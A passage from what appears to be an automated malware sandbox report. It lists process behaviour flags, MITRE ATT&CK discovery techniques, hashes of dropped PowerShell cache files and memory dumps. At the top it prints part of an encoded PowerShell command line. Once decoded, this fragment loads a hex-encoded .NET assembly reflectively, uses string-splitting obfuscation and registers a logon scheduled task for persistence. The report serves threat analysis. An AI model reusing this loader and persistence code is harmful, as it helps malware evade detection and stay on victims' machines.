QQBHAFUAQQBjAGcAQgAwAEEARgAwAEEATwBnAEEANgBBAEMAZwBBAEkAZwBCAFUAQQBHADgAQQBRAGcAQQBpAEEAQwBzAEEASQBnAEIANQBBAEgAUQBBAFoAUQBBAGkAQQBDAGsAQQBLAEEAQQBrAEEARwBnAEEAYQBRAEIAMABBAEMANABBAFUAdwBCADEAQQBHAEkAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEsAQQBBAGsAQQBIAE0AQQBkAFEAQgB6AEEAQwB3AEEATQBnAEEAcABBAEMAdwBBAEsAQQBBAHkAQQBDAG8AQQBPAEEAQQBwAEEAQwBrAEEAZgBRAEIAYgBBAEgASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAGgAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBLAEEAQQBpAEEARQB3AEEAYgB3AEEAaQBBAEMAcwBBAEkAZwBCAGgAQQBHAFEAQQBJAGcAQQBwAEEAQwBnAEEASgBBAEIAbABBAEcAbwBBAGQAZwBBAHAAQQBEAHMAQQBXAHcAQgBQAEEASABBAEEAWgBRAEIAdQBBAEYAMABBAE8AZwBBADYAQQBDAGcAQQBJAGcAQgBVAEEARwBVAEEASQBnAEEAcgBBAEMASQBBAGMAdwBCADAAQQBDAEkAQQBLAFEAQQBvAEEAQwBrAEEATwB3AEEAMwBBAEQAUQBBAE4AQQBBADAAQQBEAGsAQQBNAFEAQQAzAEEARABJAEEATwB3AEEAPQAiADsAJABzAG4AaAA9ACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAJABzAG4AaAAgAC0ASQBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFACAAJABjAHMAIAAtAEEAcgAgACQAdgBmACkAIAAtAFQAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMACAALQBVACAAJABzAG4AaAApACkAOwAzADQANwAyADQAMwAyADgANwA7AA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3144

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
f18ae92c296133b2c743d4b50caf4e94

SHA1
3c97453e5d9c67a2969eb05674c349a8e13a4a3d

SHA256
df325169a65b6634b7618fe634022a43799cf8e08406fac88180ddc44c78cd90

SHA512
47d157cc7cb6c42a611c5f48e9f8eebf85d36434df9a50e783edbba7b4e54b6962c7dd607bd2fbe860e78ea7f69591409eb6178879ad01e96792d64b1c57382e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
memory/3144-145-0x0000000006DC0000-0x0000000006DF2000-memory.dmp

Filesize
200KB

Download
memory/3144-142-0x0000000005FC0000-0x0000000006026000-memory.dmp

Filesize
408KB

Download
memory/3144-151-0x0000000007E00000-0x0000000007E96000-memory.dmp

Filesize
600KB

Download
memory/3144-150-0x0000000007B60000-0x0000000007B6A000-memory.dmp

Filesize
40KB

Download
memory/3144-149-0x0000000006DA0000-0x0000000006DBE000-memory.dmp

Filesize
120KB

Download
memory/3144-147-0x0000000070AD0000-0x0000000070B1C000-memory.dmp

Filesize
304KB

Download
memory/3436-148-0x00000000068F0000-0x000000000690A000-memory.dmp

Filesize
104KB

Download
memory/3436-143-0x0000000005C70000-0x0000000005CD6000-memory.dmp

Filesize
408KB

Download
memory/3436-144-0x0000000006380000-0x000000000639E000-memory.dmp

Filesize
120KB

Download
memory/3436-146-0x0000000007A00000-0x000000000807A000-memory.dmp

Filesize
6.5MB

Download
memory/3436-161-0x0000000006820000-0x000000000685E000-memory.dmp

Filesize
248KB

Download
memory/3436-141-0x00000000054D0000-0x00000000054F2000-memory.dmp

Filesize
136KB

Download
memory/3436-140-0x0000000005560000-0x0000000005B88000-memory.dmp

Filesize
6.2MB

Download
memory/3436-139-0x0000000004D60000-0x0000000004D96000-memory.dmp

Filesize
216KB

Download
memory/3436-160-0x0000000006820000-0x000000000685E000-memory.dmp

Filesize
248KB

Download
memory/3436-157-0x0000000008630000-0x0000000008BD4000-memory.dmp

Filesize
5.6MB

Download
memory/3436-156-0x0000000005270000-0x0000000005292000-memory.dmp

Filesize
136KB

Download
memory/4884-155-0x00007FFBFE3B0000-0x00007FFBFEE71000-memory.dmp

Filesize
10.8MB

Download
memory/4884-138-0x00007FFBFE3B0000-0x00007FFBFEE71000-memory.dmp

Filesize
10.8MB

Download
memory/4904-134-0x0000023251F90000-0x0000023251FB2000-memory.dmp

Filesize
136KB

Download
memory/4904-152-0x00007FFBFE3B0000-0x00007FFBFEE71000-memory.dmp

Filesize
10.8MB

Download
memory/4904-137-0x00007FFBFE3B0000-0x00007FFBFEE71000-memory.dmp

Filesize
10.8MB

Download